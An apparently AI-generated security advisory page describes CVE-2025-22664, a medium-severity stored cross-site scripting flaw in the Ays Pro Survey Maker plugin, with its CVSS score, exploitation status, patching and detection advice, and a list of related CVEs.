What is CVE-2025-22664?

CVE-2025-22664 is a medium-severity Cross-site Scripting (XSS) vulnerability in Ays Pro Survey Maker. Organizations should prioritize remediation to mitigate risks associated with this flaw.

What is the severity of CVE-2025-22664?

CVE-2025-22664 has a severity rating of MEDIUM with a CVSS base score of 5.9.

CVE-2025-22664 | Medium Vulnerability in Ays Pro Survey Maker

CVE-2025-22664 is a medium-severity vulnerability classified as Cross-site Scripting (XSS) in the Ays Pro Survey Maker product. This vulnerability allows improper neutralization of input during web page generation, enabling attackers to execute stored XSS attacks. The affected versions of Survey Maker include all versions prior to and including 5.1.3.5. Organizations utilizing this plugin should take immediate action to mitigate potential exploitation.

The CVSS base score for this vulnerability is 5.9, indicating a medium severity level. The attack vector is network-based, with a low attack complexity, but it requires high privileges and user interaction. This makes it essential for organizations to address this vulnerability as it poses a risk to the integrity and confidentiality of their web applications.

Risk to organizations includes potential unauthorized access to user data and manipulation of web content. Given the medium severity rating and the nature of the vulnerability, organizations should prioritize patching immediately to prevent malicious exploitation.

As of now, there is no known public exploit or proof of concept related to this vulnerability. However, the potential for exploitation remains a concern, especially in environments where the Survey Maker plugin is widely used.

Vulnerability Details

The vulnerability allows improper neutralization of input during web page generation, specifically enabling stored XSS. The issue affects the Ays Pro Survey Maker plugin, versions from n/a through 5.1.3.5. The CVSS score of 5.9 reflects a medium severity, categorized under CWE-79.

Technical Analysis

The root cause of this vulnerability lies in the improper handling of user input within the Survey Maker plugin. The attack vector is network-based, which means that an attacker could exploit this vulnerability by sending malicious input through a web interface. The attack complexity is low, enabling attackers with high privileges to execute the attack. User interaction is required, as the victim must visit a page that contains the malicious script.

The potential impacts of this vulnerability include a low confidentiality, low integrity, and low availability impact, highlighting the need for organizations to monitor and mitigate risks associated with user content generation.

Risk & Impact Analysis

The real-world risk associated with CVE-2025-22664 is significant, especially for organizations relying on the Ays Pro Survey Maker for user engagement or data collection. The potential for unauthorized access to sensitive user data or manipulation of surveys poses a serious threat. Given the CVSS score of 5.9, organizations should address this vulnerability in their priority patch cycle.

With the vulnerability being classified as medium severity, organizations may schedule remediation as part of their routine security practices, but immediate attention is recommended to mitigate any potential exploitation.

Exploitation Status

Signal	Status
Known Exploit	No
Public PoC	No
Actively Exploited	No
Ransomware Use	No

Affected Versions

The vulnerability affects all versions of Survey Maker prior to 5.1.3.6. Organizations should ensure they are using the latest version to avoid potential risks.

Mitigation & Remediation

Organizations should update the Ays Pro Survey Maker plugin to the latest version to mitigate this vulnerability. If immediate patching is not possible, consider implementing input validation and output encoding to prevent XSS attacks. Additionally, review user permissions to limit access to the survey creation functionalities.

Detection Guidance

Monitor logs for unusual entries related to survey responses and user interactions. Look for patterns indicating attempts to exploit XSS vulnerabilities, such as unexpected script tags in survey submissions. Implementing web application firewalls can also help detect and block malicious payloads.

AppSecure Threat Intelligence Insight

CVE-2025-22664 highlights the ongoing need for vigilance against XSS vulnerabilities, particularly in user-generated content scenarios. Organizations should continuously assess their web applications for potential risks and implement robust security measures.

For further information on improving your security posture, consider reviewing our guide on web application penetration testing and best practices.

Organizations should also consider adopting a penetration testing program to identify and remediate vulnerabilities proactively.

Finally, continuous education and awareness are key in preventing exploitation of such vulnerabilities. Review our resources on vulnerability management to stay informed.

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

CVE ID	Title	Severity	Vulnerability Type	Published
CVE-2025-65418	CVE-2025-65418: High Vulnerability in docuFORM Managed Print Service Client	HIGH	Path Traversal	May 11, 2026
CVE-2025-65417	CVE-2025-65417: Medium Vulnerability in docuFORM Managed Print Service Client	MEDIUM	XSS	May 11, 2026
CVE-2025-65416	CVE-2025-65416: Medium Vulnerability in docuFORM Managed Print Service Client	MEDIUM	Unrestricted File Upload	May 11, 2026
CVE-2025-65415	CVE-2025-65415: Medium Vulnerability in docuFORM Managed Print Service Client	MEDIUM	Session Fixation	May 11, 2026
CVE-2025-61314	CVE-2025-61314: High Vulnerability in GmbH Mecury Managed Print Services	HIGH	XSS	May 11, 2026

CVE-2025-22664: Medium Vulnerability in Ays Pro Survey Maker